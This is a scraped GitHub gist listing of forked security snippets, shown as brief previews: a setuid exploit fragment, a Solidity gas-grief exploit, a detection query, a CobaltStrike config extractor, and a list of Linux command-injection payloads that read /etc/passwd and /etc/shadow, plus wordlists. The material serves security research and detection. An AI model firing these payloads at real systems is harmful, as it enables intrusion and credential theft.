user@hostname:~/exploit$ cat > test.c#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
if (setuid(0) != 0) {
Smith Noorah NoorahSmith
NoorahSmith
/ word-list.js
Created
September 26, 2025 12:35
— forked from DMeechan/word-list.js
BIP39 mnemonic phases word list (2048 words)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const WORDLIST = ["abandon","ability","able","about","above","absent","absorb","abstract","absurd","abuse", | |
| "access","accident","account","accuse","achieve","acid","acoustic","acquire","across","act", | |
| "action","actor","actress","actual","adapt","add","addict","address","adjust","admit", | |
| "adult","advance","advice","aerobic","affair","afford","afraid","again","age","agent", | |
| "agree","ahead","aim","air","airport","aisle","alarm","album","alcohol","alert", | |
| "alien","all","alley","allow","almost","alone","alpha","already","also","alter", | |
| "always","amateur","amazing","among","amount","amused","analyst","anchor","ancient","anger", | |
| "angle","angry","animal","ankle","announce","annual","another","answer","antenna","antique", | |
| "anxiety","any","apart","apology","appear","apple","approve","april","arch","arctic", | |
| "area","arena","argue","arm","armed","armor","army","around","arrange","arrest", |
NoorahSmith
/ hvptcheck.c
Created
October 21, 2024 09:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <assert.h> | |
| #include <Windows.h> | |
| // Some of them were taken (and modified) from https://github.com/winsiderss/systeminformer | |
| typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION | |
| { | |
| BOOLEAN SecureKernelRunning : 1; | |
| BOOLEAN HvciEnabled : 1; |
NoorahSmith
/ SystemProcessIdInformation.cpp
Created
October 21, 2024 07:56
— forked from TheWover/SystemProcessIdInformation.cpp
Demonstrates use of NtQuerySystemInformation and SystemProcessIdInformation to get the image name of a process without opening a process handle
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Demonstrates use of NtQuerySystemInformation and SystemProcessIdInformation to get the image name of a process without opening a process handle | |
| // Author: TheWover | |
| // | |
| #include <iostream> | |
| #include <string> | |
| #include "ntdefs.h" | |
| typedef struct SYSTEM_PROCESS_ID_INFORMATION | |
| { |
NoorahSmith
/ GasGrief.sol
Created
January 11, 2024 11:28
— forked from JustDravee/GasGrief.sol
63/64 Gas Exploit Scenario
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: GPL-3.0 | |
| pragma solidity 0.8.17; | |
| interface ICallback { | |
| function beforeExecution() external; | |
| } | |
| /** Exploit Desc: **/ | |
| // The GasGriefer is used as a `callbackContract` on a swapOrder |
NoorahSmith
/ ES|QL Masquerading as MS Native DLL
Created
January 11, 2024 03:54
— forked from Samirbous/ES|QL Masquerading as MS Native DLL
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // DLLs normally located in system32 but unsigned and loaded from elsewhere | |
| // https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-enrich-data.html | |
| // example ENRICH libs-policy creation steps | |
| https://gist.github.com/Samirbous/9f9c3237a0ada745e71cc2ba3425311c | |
| ES|QL query: | |
| from .ds-logs-endpoint.events.library-* | |
| | where event.action == "load" and process.code_signature.status == "trusted" and dll.code_signature.status != "trusted" and |
NoorahSmith
/ GameOver(lay).md
Created
January 11, 2024 03:54
— forked from win3zz/GameOver(lay).md
Privilege escalation vulnerabilities in Ubuntu/Kali Linux (CVE-2023-2640 and CVE-2023-32629)
NoorahSmith
/ cs_volatility_config.py
Created
November 15, 2023 18:38
— forked from heck-gd/cs_volatility_config.py
CobaltStrike Volatility Config Extractor
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from __future__ import annotations | |
| import re | |
| from itertools import cycle | |
| MAX_SETTINGS = 128 | |
| def load_mapping(filename: str) -> dict[int, int]: | |
| """Processes textual Volatility memmap output into a page mapping.""" |
NoorahSmith
/ gist:04573476df375cb49999b152529ac6a6
Created
November 3, 2023 09:29
— forked from Yousha/gist:6832f3941977f05e70892de35e0428f9
Linux command payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> | |
| <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> | |
| <!--#exec%20cmd="/usr/bin/id;--> | |
| <!--#exec%20cmd="/usr/bin/id;--> | |
| /index.html|id| | |
| ;id; | |
| ;id | |
| ;netstat -a; | |
| ;system('cat%20/etc/passwd') | |
| ;id; |
NoorahSmith
/ HInvokeHashGen.cs
Created
September 26, 2023 08:19
— forked from dr4k0nia/HInvokeHashGen.cs
Tool to generate Hashes for HInvoke
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Linq.Expressions; | |
| using System.Reflection; | |
| using System.Text; | |
| GetMethodHash("System.Reflection.Assembly", "Load"); |
NoorahSmith
/ List of API endpoints & objects
Created
September 26, 2023 05:44
— forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
NewerOlder